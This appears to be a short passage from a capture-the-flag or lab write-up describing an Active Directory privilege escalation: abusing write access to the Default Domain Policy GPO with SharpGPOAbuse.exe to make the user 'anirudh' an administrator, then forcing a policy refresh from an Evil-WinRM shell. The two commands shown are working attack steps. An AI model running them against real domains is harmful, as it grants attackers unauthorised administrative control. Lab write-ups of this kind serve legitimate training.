Priv Escalation

We are part of the server operators group, and we have write access to the Domain Default Policy Object. Which means that if we have write access to it we can use a tool called SharpGPOAbuse.exe to add ourselves to the domain admins.

The GPO is called Default Domain Policy.

 ./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"

Then we force an update on the GPO.

*Evil-WinRM* PS C:\Users\anirudh\Desktop> gpupdate /force